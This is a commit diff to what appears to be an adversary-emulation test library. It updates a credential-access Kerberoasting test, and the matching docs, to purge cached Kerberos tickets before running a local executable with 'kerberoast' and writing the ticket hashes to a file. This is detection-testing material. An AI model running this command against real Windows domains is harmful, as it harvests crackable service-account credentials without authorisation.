Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
parent
ad7805da81
commit
246bc2e4ae
@@ -2705,10 +2705,9 @@ credential-access:
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags}
|
||||
/outfile:"#{local_folder}\#{out_file}"
|
||||
|
||||
'
|
||||
command: |
|
||||
klist purge
|
||||
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
|
||||
cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
|
||||
|
||||
'
|
||||
|
||||
@@ -99,6 +99,7 @@ This build targets .NET 4.5. If targeting a different version you will need to
|
||||
|
||||
|
||||
```powershell
|
||||
klist purge
|
||||
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
|
||||
```
|
||||
|
||||
|
||||
Reference in New Issue
Block a user